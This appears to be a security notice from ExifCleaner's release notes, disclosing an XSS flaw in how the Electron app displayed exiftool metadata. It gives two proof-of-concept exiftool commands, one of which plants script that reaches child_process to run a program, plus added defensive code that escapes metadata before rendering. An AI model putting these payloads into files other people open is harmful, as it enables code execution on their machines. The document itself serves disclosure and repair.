Cross-platform desktop GUI app to clean image metadata
exiftool HTML output in the UI. To take advantage of this, an attacker would have had to write image metadata containing malicious script code to a file that you then download and run through ExifCleaner.
Proofs of concept:
XSS:
exiftool -Comment='<img src=x onerror=alert("ok") /><b>OverJT</b>' -PixelUnits='meters' image.png
Electron reverse shell:
exiftool -Comment='<img src=x onerror=window.require("child_process").exec("/usr/bin/firefox") /><b>OverJT</b>' -PixelUnits='meters' image.png
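The class of fix for the bug described above, as an added example that is not ExifCleaner's own code: metadata values are escaped before they reach the UI, so the XSS proof-of-concept comment is displayed as inert text. The function names and the sample record (shaped like `exiftool -json` output) are assumptions constructed for illustration.

```javascript
// Added example: image metadata is untrusted input and must never be
// interpreted as markup. All names here are hypothetical, not ExifCleaner's.

const HTML_ESCAPES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Replace every character that can open a tag, close a tag, or break out of an attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern: tag names and values are concatenated straight into markup,
// so a Comment field containing <img onerror=...> becomes a live element.
function renderRowUnsafe(tag, value) {
  return "<tr><td>" + tag + "</td><td>" + value + "</td></tr>";
}

// Hardened pattern: both the tag name and the value are escaped first.
// In a renderer with a DOM, assigning to element.textContent has the same effect.
function renderRowSafe(tag, value) {
  return "<tr><td>" + escapeHtml(tag) + "</td><td>" + escapeHtml(value) + "</td></tr>";
}

// Turn one metadata record (assumed shape: the JSON array exiftool -json prints)
// into table rows using the supplied row renderer.
function renderMetadataTable(exiftoolJson, renderRow) {
  const [record] = JSON.parse(exiftoolJson);
  return Object.entries(record)
    .map(([tag, value]) => renderRow(tag, value))
    .join("\n");
}

// Constructed sample: the metadata written by the XSS proof of concept above.
const SAMPLE_JSON = JSON.stringify([
  {
    SourceFile: "image.png",
    Comment: '<img src=x onerror=alert("ok") /><b>OverJT</b>',
    PixelUnits: "meters",
  },
]);

// True if the rendered HTML still contains an element carrying an event handler.
function hasLiveHandler(html) {
  return /<[a-z][^>]*\son\w+\s*=/i.test(html);
}

console.log("unsafe:", hasLiveHandler(renderMetadataTable(SAMPLE_JSON, renderRowUnsafe)));
console.log("safe:  ", hasLiveHandler(renderMetadataTable(SAMPLE_JSON, renderRowSafe)));
```

Escaping only addresses the markup injection; whether injected script could reach `window.require` depends on the Electron renderer's Node integration settings, which this example does not cover.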
If you are running a previous version of ExifCleaner, update immediately due to a security vulnerability found in exiftool (the command-line tool that ExifCleaner uses under the hood). Thank you to all contributors for this release. As always, credits are listed in the README.
exiftool process keep-alive)
https://github.com/szTheory/exifcleaner/compare/v3.2.0...v3.3.1
https://github.com/szTheory/exifcleaner/compare/v3.2.0...v3.3.0
https://github.com/szTheory/exifcleaner/compare/v3.1.0...v3.2.0
https://github.com/szTheory/exifcleaner/compare/v3.0.0...v3.1.0
https://github.com/szTheory/exifcleaner/compare/v2.1.0...v3.0.0
https://github.com/szTheory/exifcleaner/compare/v2.0.0...v2.1.0